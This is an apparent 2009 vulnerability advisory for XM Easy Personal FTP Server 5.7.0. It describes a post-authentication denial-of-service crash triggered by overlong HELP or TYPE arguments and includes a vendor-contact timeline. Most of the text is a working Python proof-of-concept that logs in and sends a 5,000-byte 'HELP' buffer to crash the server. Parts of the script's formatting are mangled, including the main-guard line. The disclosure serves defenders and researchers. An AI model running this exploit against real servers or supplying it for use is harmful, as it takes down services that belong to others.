XM Easy Personal FTP Server Multiple DoS vulnerabilities

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/

Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service
vulnerability exists in XM Personal FTP Server that causes the application to crash when a long
list of arguments is sent to certain FTP commands post authentication.

Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent
to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a
parameter to these commands, the FTP server cannot process it and it will crash. Note that this
is a post authentication vulnerability, so user must be logged in to exploit the vulnerability.
No registers are overwritten, hence remote code execution may not be possible.

Severity:
High

Solution:
No patches available from vendor
No workaround is available at this time

Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure

PoC: Python Exploit

#!/usr/bin/python

::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]

[-] What:…[ XM Easy Personal FTP Server 5.7.0 ]…

[-] Where:…[ http://www.dxm2008.com ]…

[-] When:…[ 14-May-2009 ]…

[-] Who:…[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]…

[-] How:…[

A Denial of service vulnerability exists in XM

Personal FTP Server that causes the application to

crash when a long list of arguments is sent to

certain FTP commands post authentication…]

[-] Thankz:…[ Jambalaya, Xin and Chintan ]…

import os
import sys
import time
from ftplib import FTP

def usage():
print "[…XM Personal FTP Server 5.7.0 DoS Exploit…]"
print "[…neeraj(.)thakar(at)gmail(.)com…]\n"
print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n"
print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages
done by your crazy thinking… :P\n"

The Main function starts here…

if name == "main":
ftpport = '21'

    # get the args..
    if len(sys.argv) < 3:
            usage()
            sys.exit(1)
    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]

    print "Connecting to "+ftpserver+" using "+user+"....",

    # Try opening a connection to the FTP server
    try:
            F = FTP(ftpserver)
            F.timeout = 3
            if F:
                    print 'Connected !'
    except:
            print "\nCould not connect to the Server :(\n"
            sys.exit(1)

    #Lets create the Buffer..
    crap = "A" * 5000

    # Creat'in da'bomb
    dabomb = 'HELP '+crap

    print "Press any key to login.."
    ch = sys.stdin.read(1)

    # Lets login
    try:
            F.login(user, passwd)
    except:
            print "Oops.. Looks like you forgot to create a login !!\n"
            F.quit()
            sys.exit(1)
    print "Target Locked, Press any key to fire..",
    ch = sys.stdin.read(1)

    print 'Sendin Da\'Bomb..'
    try:
            F.sendcmd(dabomb)
    except:
            print 'Target destroyed !! Mission successfull..!'

    print 'Returning to base..'
    F.close()
    sys.exit(0)

---